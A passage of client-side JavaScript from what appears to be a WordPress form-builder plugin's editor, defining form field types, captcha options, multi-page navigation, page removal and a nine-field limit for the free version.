	w_name_fields = ['no', 'no'];
	type_name(new_id,'Name:', '100', 'left', w_first_val, w_title, w_mini_labels, '100', 'normal', 'no', 'no', '',w_attr_name, w_attr_value, w_name_fields)
}
	
function go_to_type_address(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	w_mini_labels=['Street Address', 'Street Address Line 2', 'City', 'State / Province / Region', 'Postal / Zip Code', 'Country',];
	w_disabled_fields=['no', 'no', 'no', 'no', 'no', 'no', 'no'];
	type_address(new_id,'Address:', '100', 'left', '300', w_mini_labels, w_disabled_fields, 'no', 'wdform_address', w_attr_name, w_attr_value)
}

function go_to_type_phone(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
 	w_first_val=['',''];
 	w_title=['',''];
	w_mini_labels = ['Area Code','Phone Number'];
	type_phone(new_id,'Phone:', '100', 'left', '135', w_first_val, w_title, w_mini_labels, 'no', 'no', '',w_attr_name, w_attr_value)
}

function go_to_type_submitter_mail(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_submitter_mail(new_id,'E-mail:', '100', 'left', '200', '', '', 'no', '', w_attr_name, w_attr_value);
}

function go_to_type_time(new_id)
{
	
 	w_attr_name=[];
 	w_attr_value=[];
	w_mini_labels = ['HH','MM','SS', 'AM/PM'];
	type_time(new_id, 'Time:', '100', 'left', '24', '0', '1','','','', w_mini_labels, 'no', '',w_attr_name, w_attr_value);
	
}

function go_to_type_date(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	
	type_date(new_id, 'Date:', '100', 'left', '', 'no', '', '%Y-%m-%d', '...',w_attr_name, w_attr_value, 'no');
}

function go_to_type_date_fields(new_id)
{
	
 	w_attr_name=[];
 	w_attr_value=[];
	var current_date = new Date();
	w_to=current_date.getFullYear();

	type_date_fields(new_id, 'Date:', '100', 'left', '', '', '', 'SELECT', 'SELECT', 'SELECT', 'day', 'month', 'year', '60', '100', '80', 'no', 'wdform_date_fields', '1901', w_to, '&nbsp;/&nbsp;', w_attr_name, w_attr_value);

}

function go_to_type_button(new_id)
{
 	w_title=[ "Button"];
 	w_func=[""];
	
 	w_attr_name=[];
 	w_attr_value=[];
	
	type_button(new_id, w_title, w_func, 'wdform_button',w_attr_name, w_attr_value);
}


function el_captcha()
{
	//edit table
	if(document.getElementById("editing_id").value)
		new_id=document.getElementById("editing_id").value;
	else
		new_id=gen;
		
	if(document.getElementById('_wd_captchaform_id_temp'))
	{
		alert("The captcha already has been created.");
		return;
	}
	
	if(document.getElementById('_wd_arithmetic_captchaform_id_temp'))
	{
		alert("The captcha already has been created.");
		return;
	}
	
	if(document.getElementById('wd_recaptchaform_id_temp'))
	{
		alert("The captcha already has been created.");
		return;
	}
	
	var el_type_label = document.createElement('label');
		el_type_label.style.cssText ="color:#000; font-weight:bold; font-size: 13px";
		el_type_label.innerHTML = "<br />&nbsp;&nbsp;Field type";
	
	var el_type_radio_captcha = document.createElement('input');
		el_type_radio_captcha.setAttribute("id", "el_type_captcha");
		el_type_radio_captcha.setAttribute("type", "radio");
		el_type_radio_captcha.setAttribute("value", "captcha");
		el_type_radio_captcha.style.cssText = "margin-left:15px";
		el_type_radio_captcha.setAttribute("name", "el_type_captcha");
		el_type_radio_captcha.setAttribute("onclick", "go_to_type_captcha('"+new_id+"')");
		el_type_radio_captcha.setAttribute("checked", "checked");
		
	var el_type_label_captcha = document.createElement('label');	
		el_type_label_captcha.setAttribute("for", "el_type_captcha");
		el_type_label_captcha.innerHTML = 'Simple Captcha';		
		
	var el_type_radio_arithmetic_captcha = document.createElement('input');
		el_type_radio_arithmetic_captcha.setAttribute("id", "el_type_arithmetic_captcha");
		el_type_radio_arithmetic_captcha.setAttribute("type", "radio");
		el_type_radio_arithmetic_captcha.setAttribute("value", "arithmetic_captcha");
		el_type_radio_arithmetic_captcha.style.cssText = "margin-left:15px";
		el_type_radio_arithmetic_captcha.setAttribute("name", "el_type_captcha");
		el_type_radio_arithmetic_captcha.setAttribute("onclick", "go_to_type_arithmetic_captcha('"+new_id+"')");
		
	var el_type_label_arithmetic_captcha = document.createElement('label');	
		el_type_label_arithmetic_captcha.setAttribute("for", "el_type_arithmetic_captcha");
		el_type_label_arithmetic_captcha.innerHTML = 'Arithmetic Captcha';	

	
	var el_type_radio_recaptcha = document.createElement('input');
		el_type_radio_recaptcha.setAttribute("id", "el_type_radio_recaptcha");
		el_type_radio_recaptcha.setAttribute("type", "radio");
		el_type_radio_recaptcha.setAttribute("value", "recaptcha");
		el_type_radio_recaptcha.style.cssText = "margin-left:15px";
		el_type_radio_recaptcha.setAttribute("name", "el_type_captcha");
		el_type_radio_recaptcha.setAttribute("onclick", "go_to_type_recaptcha('"+new_id+"')");
				
	var el_type_label_recaptcha = document.createElement('label');	
		el_type_label_recaptcha.setAttribute("for", "el_type_radio_recaptcha");
		el_type_label_recaptcha.innerHTML = 'Recaptcha';					


	var td  = document.getElementById('edit_table');
	
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	
	td.appendChild(el_type_label);
	td.appendChild(br1);
	td.appendChild(el_type_radio_captcha);
	td.appendChild(el_type_label_captcha);
	td.appendChild(br2);
	td.appendChild(el_type_radio_arithmetic_captcha);
	td.appendChild(el_type_label_arithmetic_captcha);
	td.appendChild(br3);
	td.appendChild(el_type_radio_recaptcha);
	td.appendChild(el_type_label_recaptcha);
	
	var pos=document.getElementsByName("el_pos");
		pos[0].removeAttribute("disabled");
		pos[1].removeAttribute("disabled");
		pos[2].removeAttribute("disabled");
	
	var sel_el_pos=document.getElementById("sel_el_pos");
		sel_el_pos.removeAttribute("disabled", "disabled");
	
 	w_attr_name=[];
 	w_attr_value=[];
	go_to_type_captcha(new_id);
}


function go_to_type_captcha(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_captcha(new_id,'Word Verification:', '100', 'left', '6','',w_attr_name, w_attr_value);
}

function go_to_type_arithmetic_captcha(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_arithmetic_captcha(new_id, 'Word Verification:', '100', 'left', '1', '+, -, *, /', '', '60', w_attr_name, w_attr_value);
}

function go_to_type_recaptcha(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_recaptcha(new_id,'Recaptcha Word Verification:', '100', 'left', '', '', 'red', '',w_attr_name, w_attr_value);
}



///////////////////////////////////////////////
///////////  el_page_break   //////////////////
///////////////////////////////////////////////

function el_page_break()
{
		for(t=form_view_max; t>0; t--)
		{
			if(document.getElementById('form_id_tempform_view'+t))
			{
					last_view=t;
					break;
			}
		}
	if(document.getElementById('form_id_tempform_view'+t).getAttribute('page_title'))
		w_page_title=document.getElementById('form_id_tempform_view'+t).getAttribute('page_title');
	else
		w_page_title='Untitled Page';
	
	w_title	=[ "Next","Previous"];
 	w_type	=["text","text"];
 	w_class	=["wdform-page-button","wdform-page-button"];
 	w_check	=['false', 'false'];
	
 	w_attr_name=[];
 	w_attr_value=[];
	
	type_page_break("0",w_page_title , w_title, w_type, w_class, w_check, w_attr_name, w_attr_value);
}
function el_page_navigation()
{
	
	w_type=document.getElementById('pages').getAttribute('type');
	w_show_numbers=false;
	w_show_title=false;

	if(document.getElementById('pages').getAttribute('show_numbers')=="true")
		w_show_numbers=true;
	
	if(document.getElementById('pages').getAttribute('show_title')=="true")
		w_show_title=true;
	
 	w_attr_name=[];
 	w_attr_value=[];
	
	type_page_navigation( w_type, w_show_title , w_show_numbers , w_attr_name, w_attr_value);
}

function remove_section_break(id)
{
	var wdform_section_break=document.getElementById( "wdform_field"+id).parentNode;
	

	move=wdform_section_break.nextSibling;
	to=wdform_section_break.previousSibling;
	
	
	l=move.childNodes.length;
	for(k=0;k<l;k++)
	{
		if(to.childNodes[k])
		{
			while(move.childNodes[k].firstChild)
				to.childNodes[k].appendChild(move.childNodes[k].firstChild);
		}
		else
			to.appendChild(move.childNodes[k]);			
	}
	
	wdform_section_break.parentNode.removeChild(wdform_section_break.nextSibling);
		
	wdform_section_break.parentNode.removeChild(wdform_section_break);
	
}

function remove_row(id)
{
	var wdform_row=document.getElementById( "wdform_field"+id).parentNode;
	var wdform_column=wdform_row.parentNode;

	wdform_column.removeChild(wdform_row);
	
}

function destroyChildren(node)
{
  while (node.firstChild)
      node.removeChild(node.firstChild);
}

function make_pagebreak_button(next_or_previous,title,type, class_ ,id)
{
	switch(type)
	{
		case 'button': 
		{ 
		
			var element = document.createElement('button');
				element.setAttribute('id', "page_"+next_or_previous+"_"+id);
				element.setAttribute('type', "button");
				element.setAttribute('class', class_);
				element.style.cursor="pointer";
				element.innerHTML=title;
				
			return element;
			
			break;
		}
		case 'text': {	
			
			var element = document.createElement('span');
				element.setAttribute('id', "page_"+next_or_previous+"_"+id);
				element.setAttribute('class', class_);
				element.style.cursor="pointer";
				element.innerHTML=title;
				
			return element;
			
			break;
		}
		case 'img':{ 			
		
			var element = document.createElement('img');
				element.setAttribute('id', "page_"+next_or_previous+"_"+id);
				element.setAttribute('class', class_);
				element.style.cursor="pointer";
				element.src=title;
				
			return element;
			
			break;
		}
	}
}

function show_or_hide(id) {
	if (!jQuery("#form_id_tempform_view"+id).is(":visible")) {
		show_form_view(id);
  }
	else {
		hide_form_view(id);
  }
}

function show_form_view(id) {
	jQuery("#form_id_tempform_view_img"+id).attr( "style", "float: right;" );
	jQuery("#form_id_tempform_view_img"+id).children().eq(0).css( "float", "none" );
	jQuery("#form_id_tempform_view_img"+id).children().eq(1).remove();
	jQuery("#show_page_img_"+id).attr( "src", plugin_url + "/images/minus.png" );
	jQuery("#show_page_img_"+id).attr( "onmouseover", "chnage_icons_src(this,'minus')" );
	jQuery("#show_page_img_"+id).attr( "onmouseout", "chnage_icons_src(this,'minus')" );
	jQuery("#form_id_tempform_view"+id).show('medium');
}

function hide_form_view(id) {
	jQuery("#form_id_tempform_view"+id).hide('medium', function() {
    jQuery("#form_id_tempform_view_img"+id).attr("style", "height: 40px; float: none;");
    jQuery("#form_id_tempform_view_img"+id).children().eq(0).css( "float", "right" );
    jQuery("#form_id_tempform_view_img"+id).append("<div style='float: left;line-height: 40px;margin-left: 20px;'>"+jQuery("#form_id_tempform_view"+id).attr('page_title')+"</div>")
    jQuery("#show_page_img_"+id).attr( "src", plugin_url + "/images/plus.png" );
    jQuery("#show_page_img_"+id).attr( "onmouseover", "chnage_icons_src(this,'plus')" );
    jQuery("#show_page_img_"+id).attr( "onmouseout", "chnage_icons_src(this,'plus')" );
	});
}

function generate_buttons(id)
{

	form_view_elemet=document.getElementById("form_id_tempform_view"+id);
			var td = document.createElement("div");
				td.setAttribute("valign", "middle");
				td.setAttribute("align", "left");
				td.style.display="table-cell";
				td.style.width="40%";
			page_nav.appendChild(td);

	if(form_view_elemet.parentNode.previousSibling)
	{
		if(form_view_elemet.parentNode.previousSibling.tagName=="DIV")
			table=true;
		else
			if(form_view_elemet.parentNode.previousSibling.previousSibling)
				if(form_view_elemet.parentNode.previousSibling.previousSibling.tagName=="DIV")
					table=true;
				else
					table=false;
			else
				table=false;
				
		if(table)
		{
			/*if(!table.firstChild.tagName)
				table.removeChild(table.firstChild);*/

			if(form_view_elemet.getAttribute('previous_title'))
				{
						previous_title	= form_view_elemet.getAttribute('previous_title');
						previous_type	= form_view_elemet.getAttribute('previous_type');
						previous_class	= form_view_elemet.getAttribute('previous_class');
				}
					else
					{
						previous_title	= "Previous";
						previous_type	= "button";
						previous_class	= "";
					}
			next_or_previous="previous";

			previous=make_pagebreak_button(next_or_previous, previous_title, previous_type, previous_class, id);
			td.appendChild(previous);
		}
	}


	var td = document.createElement("div");
		td.setAttribute("id", "page_numbersform_id_temp"+id);
		td.setAttribute("valign", "middle");
		td.setAttribute("align", "center");
		td.style.display="table-cell";
	page_nav.appendChild(td);


			var td = document.createElement("div");
				td.setAttribute("valign", "middle");
				td.setAttribute("align", "right");
				td.style.display="table-cell";
				td.style.width="40%";
				page_nav.appendChild(td);
		

	if(form_view_elemet.parentNode.nextSibling)
	{
		if(form_view_elemet.parentNode.nextSibling.tagName=="DIV")
			table=true;
		else
			if(form_view_elemet.parentNode.nextSibling.nextSibling)
			{
				if(form_view_elemet.parentNode.nextSibling.nextSibling.tagName=="DIV")
					table=true;
				else
					table=false;
			}
			else
				table=false;
				
		if(table)
		{
			if(form_view_elemet.getAttribute('previous_title')){
						next_title	=form_view_elemet.getAttribute('next_title');
						next_type	=form_view_elemet.getAttribute('next_type');
						next_class	=form_view_elemet.getAttribute('next_class');
					}
					else
					{
						next_title	= "Next";
						next_type	= "button";
						next_class	= "";
					}
		
			next_or_previous="next";
		
			next=make_pagebreak_button(next_or_previous,next_title,next_type,next_class, id);
			td.appendChild(next);
		}
	}

}

function generate_page_nav(id)
{
form_view=id;
document.getElementById('form_id_tempform_view'+id).parentNode.style.borderWidth="1px";
////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////
for(t=1; t<=form_view_max; t++)
	if(document.getElementById('form_id_tempform_view'+t))
	{
		page_nav=document.getElementById("form_id_temppage_nav"+t);
		destroyChildren(page_nav);
		generate_buttons(t);
	}

generate_page_bar();
refresh_page_numbers();

////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////
}

function remove_page(id)
{
	if(confirm('Do you want to delete the page?'))
	{
		refresh_pages_without_deleting(id);
	}
}

function remove_page_all(id)
{
	if(confirm('Do you want to delete the all fields in this page?'))
	{
		form_view_elemet=document.getElementById("form_id_tempform_view"+id);
		
				form_view_count=0;
			
		for(i=1; i<=30; i++)
		{
			if(document.getElementById('form_id_tempform_view'+i))
			{
				form_view_count++;
			}
		}

	
		if(form_view_count==1)
		{
	 
			form_view_elemet.innerHTML='';
			
			tbody=form_view_elemet;		
				
			tr=document.createElement('div');
				tr.setAttribute('class','wdform_section');
				tr.style.display="table-row";
				
			tr_page_nav=document.createElement('div');
				tr_page_nav.setAttribute('valign','top');
				tr_page_nav.setAttribute('class','wdform_footer');
				tr_page_nav.style.width="100%";
				
			td_page_nav=document.createElement('div');
				td_page_nav.style.width="100%";
				
			table_min_page_nav=document.createElement('div');
				table_min_page_nav.style.width="100%";
				table_min_page_nav.style.display="table";
				
			tbody_min_page_nav=document.createElement('div');
				tbody_min_page_nav.style.display="table-row-group";
			tr_min_page_nav=document.createElement('div');
				tr_min_page_nav.setAttribute('id','form_id_temppage_nav'+form_view);
				tr_min_page_nav.style.display="table-row";
				
				
			table_min=document.createElement('div');
				table_min.setAttribute('class','wdform_column');

			tr.appendChild(table_min);
			
			tbody_min_page_nav.appendChild(tr_min_page_nav);
			table_min_page_nav.appendChild(tbody_min_page_nav);
			td_page_nav.appendChild(table_min_page_nav);
			tr_page_nav.appendChild(td_page_nav);
			tbody.appendChild(tr);
			tbody.appendChild(tr_page_nav);
			
		return;
		}
		

		
		form_view_table=form_view_elemet.parentNode;
		document.getElementById("take").removeChild(form_view_table);
		refresh_pages(id);
	}
}

function refresh_pages(id)
{
	temp=1;
	form_view_count=0;
	destroyChildren(document.getElementById("pages"));

	for(i=1; i<=30; i++)
	{
		if(document.getElementById('form_id_tempform_view'+i))
		{
			form_view_count++;
		}
	}

	if(form_view_count>1)
	{
		for(i=1; i<=30; i++)
		{
			if(document.getElementById('form_id_tempform_view'+i))
			{
				page_number = document.createElement('span');
				page_number.setAttribute('id','page_'+i);
				page_number.setAttribute('class','page_deactive');
				page_number.innerHTML=(temp);
				temp++;
				document.getElementById("pages").appendChild(page_number);
			}
		}
	}
	
	else
	{
		destroyChildren(document.getElementById("edit_page_navigation"));
		for(i=1; i<=30; i++)
		{
			if(document.getElementById('form_id_tempform_view'+i))
			{
				document.getElementById('form_id_tempform_view'+i).parentNode.style.borderWidth="0px";
				document.getElementById('form_id_tempform_view'+i).style.display="block";
				document.getElementById("form_id_temppage_nav"+i).innerHTML="";
				
				
	jQuery("#form_id_tempform_view_img"+i).attr( "style", "float: right;" );
	jQuery("#form_id_tempform_view_img"+i).children().eq(0).css( "float", "none" );
	jQuery("#form_id_tempform_view_img"+i).children().eq(1).remove();
	jQuery("#show_page_img_"+i).attr( "src", plugin_url + "/images/minus.png" );
	jQuery("#show_page_img_"+id).attr( "onmouseover", "chnage_icons_src(this,'minus')" );
	jQuery("#show_page_img_"+id).attr( "onmouseout", "chnage_icons_src(this,'minus')" );

				
				
				form_view=i;
				return;
			}
		}	
	}
	
	for(i=parseInt(id)+1; i<=30; i++)
		if(document.getElementById('form_id_tempform_view'+i))
		{
			generate_page_nav(i);
			return;
		}
		
	for(i=parseInt(id)-1; i>0; i--)
		if(document.getElementById('form_id_tempform_view'+i))
		{
			generate_page_nav(i);
			return;
		}
	
}

function refresh_pages_without_deleting(id)
{
	form_view_elemet=document.getElementById("form_id_tempform_view"+id);
	
		
	form_view_count=0;
	for(i=1; i<=30; i++)
	{
		if(document.getElementById('form_id_tempform_view'+i))
		{
			form_view_count++;
		}
	}


	
	if(form_view_count==1)
	{
	
		form_view_elemet.innerHTML='';
 
		tbody=form_view_elemet;		
			
		tr=document.createElement('div');
			tr.setAttribute('class','wdform_section');
			tr.style.display="table-row";
		//td=document.createElement('td');
			//td.setAttribute('class','wdform_td1');
			
		tr_page_nav=document.createElement('div');
			tr_page_nav.setAttribute('valign','top');
			tr_page_nav.setAttribute('class','wdform_footer');
			tr_page_nav.style.width="100%";
			
		td_page_nav=document.createElement('div');
			td_page_nav.style.width="100%";
			
		table_min_page_nav=document.createElement('div');
			table_min_page_nav.style.width="100%";
			table_min_page_nav.style.display="table";
			
		tbody_min_page_nav=document.createElement('div');
			tbody_min_page_nav.style.display="table-row-group";
		tr_min_page_nav=document.createElement('div');
			tr_min_page_nav.setAttribute('id','form_id_temppage_nav'+form_view);
			tr_min_page_nav.style.display="table-row";
			
		table_min=document.createElement('div');
			table_min.setAttribute('class','wdform_column');
			
		tr.appendChild(table_min);
		
		tbody_min_page_nav.appendChild(tr_min_page_nav);
		table_min_page_nav.appendChild(tbody_min_page_nav);
		td_page_nav.appendChild(table_min_page_nav);
		tr_page_nav.appendChild(td_page_nav);
		tbody.appendChild(tr);
		tbody.appendChild(tr_page_nav);
		
	return;
	}
	

	
	
	table=form_view_elemet.parentNode.previousSibling;
	
	while(table)
	{
		if(table.tagName=="DIV")
			break;
		else
			table=table.previousSibling;
	}
				
	if(!table)
	{
		table=form_view_elemet.parentNode.nextSibling;
		while(table)
		{
			if(table.tagName=="DIV")
				break;
			else
				table=table.nextSibling;
		}

	}
			table_form_view=table.firstChild;

	////////////////////////////////////////////////////
			i=gen;
			gen++;
			
			
			var wdform_row = document.createElement('div');
				wdform_row.setAttribute("wdid", i);
				wdform_row.setAttribute("type", "type_section_break");
				wdform_row.setAttribute("class", "wdform_tr_section_break");
		
			var wdform_field = document.createElement('div');
				wdform_field.setAttribute("id", "wdform_field"+i);
				wdform_field.setAttribute("type", "type_section_break");
				wdform_field.setAttribute("class", "wdform_field_section_break");
				
			var wdform_arrows = document.createElement('div');
				wdform_arrows.setAttribute("id", "wdform_arrows"+i);
				wdform_arrows.setAttribute("class", "wdform_arrows");
				
			wdform_field.appendChild(wdform_arrows);
		//	wdform_row.appendChild(wdform_arrows);
			wdform_row.appendChild(wdform_field);

			var select_ = document.getElementById('sel_el_pos');
			var option = document.createElement('option');
				option.setAttribute("id", i+"_sel_el_pos");
				option.setAttribute("value", i);
				option.innerHTML="custom_"+i;
				
			wdform_page=document.getElementById('form_id_tempform_view'+form_view);

			var img_X = document.createElement("img");
					img_X.setAttribute("src", plugin_url + "/images/delete_el.png");
					img_X.setAttribute("title", "Remove the field");
					img_X.setAttribute("onclick", 'remove_section_break("'+i+'")');
					img_X.setAttribute("onmouseover", 'chnage_icons_src(this,"delete_el")');
					img_X.setAttribute("onmouseout", 'chnage_icons_src(this,"delete_el")');
					
			var td_X = document.createElement("div");
					td_X.setAttribute("id", "X_"+i);
					td_X.setAttribute("class", "element_toolbar");
					td_X.appendChild(img_X);
//image pah@					
			var img_EDIT = document.createElement("img");
					img_EDIT.setAttribute("src", plugin_url + "/images/edit.png");
					img_EDIT.setAttribute("title", "Edit the field");
					img_EDIT.setAttribute("onclick", 'edit("'+i+'")');
					img_EDIT.setAttribute("onmouseover", 'chnage_icons_src(this,"edit")');
					img_EDIT.setAttribute("onmouseout", 'chnage_icons_src(this,"edit")');
					
			var td_EDIT = document.createElement("div");
					td_EDIT.setAttribute("id", "edit_"+i);
					td_EDIT.setAttribute("class", "element_toolbar");
					td_EDIT.appendChild(img_EDIT);
		
			var img_DUBLICATE = document.createElement("img");
					img_DUBLICATE.setAttribute("src", plugin_url + "/images/duplicate.png");
					img_DUBLICATE.setAttribute("title", "Duplicate the field");
					img_DUBLICATE.setAttribute("onclick", 'duplicate("'+i+'")');
					img_DUBLICATE.setAttribute("onmouseover", 'chnage_icons_src(this,"duplicate")');
					img_DUBLICATE.setAttribute("onmouseout", 'chnage_icons_src(this,"duplicate")');
					
			var td_DUBLICATE = document.createElement("div");
					td_DUBLICATE.setAttribute("id", "duplicate_"+i);
					td_DUBLICATE.setAttribute("class", "element_toolbar");
					td_DUBLICATE.appendChild(img_DUBLICATE);
					
			var in_editor = document.createElement("div");
					in_editor.setAttribute("id", i+"_element_sectionform_id_temp");
         			in_editor.setAttribute("align", 'left');
         			in_editor.setAttribute("class", 'wdform_section_break');

				in_editor.innerHTML="<div class='wdform-section-break-div' style='min-width: 300px; border-top:1px solid'></div>";
			
			
			var label = document.createElement('span');
					label.setAttribute("id", i+"_element_labelform_id_temp");
					label.innerHTML = "custom_"+i;
					label.style.cssText = 'display:none';
					
			wdform_field.appendChild(in_editor);
			td_EDIT.appendChild(label);

			wdform_arrows.appendChild(td_X);
			wdform_arrows.appendChild(td_EDIT);
			wdform_arrows.appendChild(td_DUBLICATE);

			
				beforeTr=table_form_view.lastChild;
				table_form_view.insertBefore(wdform_row, beforeTr);
		

	

	while(form_view_elemet.childNodes[1])
	{
		beforeTr=table_form_view.lastChild;
		table_form_view.insertBefore(form_view_elemet.firstChild, beforeTr);
	}
	
	

	
		form_view_table=form_view_elemet.parentNode;
		document.getElementById("take").removeChild(form_view_table);

		refresh_pages(id);
}


function make_page_steps_front()
{
	destroyChildren(document.getElementById("pages"));
	show_title=document.getElementById('el_show_title_input').checked;
	k=0;
	for(j=1; j<=form_view_max; j++)
	{	
		if(document.getElementById('form_id_tempform_view'+j))
			{
			if(document.getElementById('form_id_tempform_view'+j).getAttribute('page_title'))
				w_pages=document.getElementById('form_id_tempform_view'+j).getAttribute('page_title');
			else
				w_pages=""
			k++;
			
			page_number = document.createElement('span');
			page_number.setAttribute('id','page_'+j);
			page_number.setAttribute('onClick','generate_page_nav("'+j+'")');
			if(j==form_view)
				page_number.setAttribute('class',"page_active");
			else
				page_number.setAttribute('class',"page_deactive");
			if(show_title)
			{
				page_number.innerHTML=w_pages;
			}
			else
				page_number.innerHTML=k;
			
			document.getElementById("pages").appendChild(page_number);
		}
	}

}

function make_page_percentage_front()
{
	destroyChildren(document.getElementById("pages"));
	show_title=document.getElementById('el_show_title_input').checked;
	
    var div_parent = document.createElement('div');
       	div_parent.setAttribute("class", "page_percentage_deactive");

    var div = document.createElement('div');
       	div.setAttribute("id", "div_percentage");
       	div.setAttribute("class", "page_percentage_active");
		
	var b = document.createElement('b');

	div.appendChild(b);
	
	k=0;
	cur_page_title='';
	for(j=1; j<=form_view_max; j++)
	{	
		if(document.getElementById('form_id_tempform_view'+j))
			{
			if(document.getElementById('form_id_tempform_view'+j).getAttribute('page_title'))
				w_pages=document.getElementById('form_id_tempform_view'+j).getAttribute('page_title');
			else
				w_pages=""
			k++;
				
			if(j==form_view)
			{
				if(show_title)
				{ 
					var cur_page_title = document.createElement('span');
					if(k==1)
						cur_page_title.style.paddingLeft="30px";
					else
						cur_page_title.style.paddingLeft="5px";
						cur_page_title.innerHTML=w_pages;
				}
				page_number=k;

			}
		}
	}
	b.innerHTML=Math.round(((page_number-1)/k)*100)+'%';
	div.style.width=((page_number-1)/k)*100+'%';
	div_parent.appendChild(div);
	if(cur_page_title)
		div_parent.appendChild(cur_page_title);
	document.getElementById("pages").appendChild(div_parent);

	
}
function make_page_none_front()
{
	var no_pagbar = document.createElement('div');
		no_pagbar.innerHTML = "NO PAGE BAR";
		no_pagbar.style.cssText = 'width:100px; padding:10px; border:1px solid #ccc;';
	
	jQuery('#pages').empty();
	jQuery('#pages').append(no_pagbar);
}

function generate_page_bar()
{
need_enable=false;
el_page_navigation();
add(0, false);
need_enable=true;
}

function remove_add_(id)
{
			attr_name= new Array();
			attr_value= new Array();
			var input = document.getElementById(id); 
			atr=input.attributes;
			for(v=0;v<30;v++)
				if(atr[v] )
				{
					if(atr[v].name.indexOf("add_")==0)
					{
						attr_name.push(atr[v].name.replace('add_',''));
						attr_value.push(atr[v].value);
						input.removeAttribute(atr[v].name);
						v--;
					}
				}
			for(v=0;v<attr_name.length; v++)
			{
				input.setAttribute(attr_name[v],attr_value[v])
			}
}

function vorchjogen() {
	is9 = 0;
	for (v = 0; v < 100; v++) {
		if (document.getElementById('wdform_field' + v)) {
			if (document.getElementById('wdform_field' + v).getAttribute("type") != "type_section_break") {
				is9++;
			}
		}
		if (is9 >= 9) {
			break;
		}
	}
	if (is9 >= 9) {
		alert("The free version is limited up to 9 fields to add. If you need this functionality, you need to buy the commercial version.");
		return true;
	}
	return false;
}

function show_arrows(id)
{
	if(jQuery("#wdform_field"+id).attr("type")=='type_editor')
		jQuery("#wdform_field"+id).css("margin-top","-5px");
		
	jQuery("#wdform_field"+id).css({"background-color":"rgb(224, 224, 224)","border":"1px solid rgb(213, 213, 213)"});
	jQuery("#wdform_arrows"+id).removeClass("wdform_arrows");
	jQuery("#wdform_arrows"+id).addClass("wdform_arrows_show");
	jQuery("#wdform_arrows"+id).show();

}

function add(key, after_edit, wdid)
{
  if(after_edit && jQuery('#enable_sortable').prop( 'checked' ))
		show_arrows(wdid);
	if(document.getElementById("element_type").value=="type_grading")
	{

	for(k=100;k>0;k--)
	{
		 if(document.getElementById("el_items"+k))
		 {
			break;
		 }
	}	
	 m=k;


	var items_input="";
	
	for(i=0;i<=m;i++){
	if(document.getElementById("el_items"+i)){
	items_input = items_input+document.getElementById("el_items"+i).value+":";	
	}
	}
	
	items_input += document.getElementById("element_total").value;
	
	if(document.getElementById('editing_id').value)
		id=document.getElementById('editing_id').value;
	else
		id=gen;

  
   var hidden_input_item = document.createElement('input');
						hidden_input_item.setAttribute("id", id+"_hidden_itemform_id_temp");
						hidden_input_item.setAttribute("name", id+"_hidden_itemform_id_temp");
						hidden_input_item.setAttribute("type", "hidden");
						hidden_input_item.setAttribute("value", items_input);	
						
	
  var td_for_hidden = document.getElementById(id+"_element_sectionform_id_temp");								
						
	td_for_hidden.appendChild(hidden_input_item);

	}
	
	
	if(document.getElementById("element_type").value=="type_matrix")
	{
		for(i=100;i>0;i--)
		{
			if(document.getElementById("el_rows"+i))
				break;
			
		}	
		m=i;

		for(i=100;i>0;i--)
		{
			if(document.getElementById("el_columns"+i))
				break;
		}	
		n=i;
		var row_input="";
		var column_input="";
		var row_num="";
		var column_num="";
	
		for(i=1;i<=m;i++)
		{
			if(document.getElementById("el_rows"+i)) {
				row_input = row_input+document.getElementById("el_rows"+i).value+"***";	
				row_num += i+',';
			}
		}
	
		for(i=1;i<=n;i++)
		{
			if(document.getElementById("el_columns"+i))
			{
				column_input= column_input+document.getElementById("el_columns"+i).value+"***";	
				column_num += i+',';
			}
		}
		
		
		if(document.getElementById('editing_id').value)
			id=document.getElementById('editing_id').value;
		else
			id=gen;
	  
		var td_for_hidden = document.getElementById(id+"_element_sectionform_id_temp");

		var hidden_input_row = document.createElement('input');
			hidden_input_row.setAttribute("id", id+"_hidden_rowform_id_temp");
			hidden_input_row.setAttribute("name", id+"_hidden_rowform_id_temp");
			hidden_input_row.setAttribute("type", "hidden");
			hidden_input_row.setAttribute("value", row_input);	
	
		var hidden_ids_row = document.createElement('input');
			hidden_ids_row.setAttribute("id", id+"_row_idsform_id_temp");
			hidden_ids_row.setAttribute("name", id+"_row_idsform_id_temp");
			hidden_ids_row.setAttribute("type", "hidden");
			hidden_ids_row.setAttribute("value", row_num);	
				
		var hidden_input_column = document.createElement('input');
			hidden_input_column.setAttribute("id", id+"_hidden_columnform_id_temp");
			hidden_input_column.setAttribute("name", id+"_hidden_columnform_id_temp");
			hidden_input_column.setAttribute("type", "hidden");
			hidden_input_column.setAttribute("value", column_input);

		var hidden_ids_column = document.createElement('input');
			hidden_ids_column.setAttribute("id", id+"_column_idsform_id_temp");
			hidden_ids_column.setAttribute("name", id+"_column_idsform_id_temp");
			hidden_ids_column.setAttribute("type", "hidden");
			hidden_ids_column.setAttribute("value", column_num);								
						
		td_for_hidden.appendChild(hidden_input_row);
		td_for_hidden.appendChild(hidden_ids_row);
		td_for_hidden.appendChild(hidden_input_column);
		td_for_hidden.appendChild(hidden_ids_column);
	}

	if(document.getElementById("element_type").value=="type_section_break")
	{
		form_view=0;
		for(t=form_view_max; t>0; t--)
		{
			if(document.getElementById('form_id_tempform_view'+t))
				if(jQuery("#form_id_tempform_view"+t).is(":visible"))
				{
					form_view=t;
					break;
				}
		}
	
		if(form_view==0)
		{	alert("The pages are closed");
			return;
		}
		
		if(document.getElementById('editing_id').value)
		{
			i=document.getElementById('editing_id').value;		
			document.getElementById('editing_id').value="";
			
			
			wdform_field_in_editor=document.getElementById(i+"_element_sectionform_id_temp");

			
      ifr_id = "form_maker_editor_ifr";	
			ifr=getIFrameDocument(ifr_id);
			if(document.getElementById('form_maker_editor').style.display=="none")
				wdform_field_in_editor.innerHTML=ifr.body.innerHTML;
			else
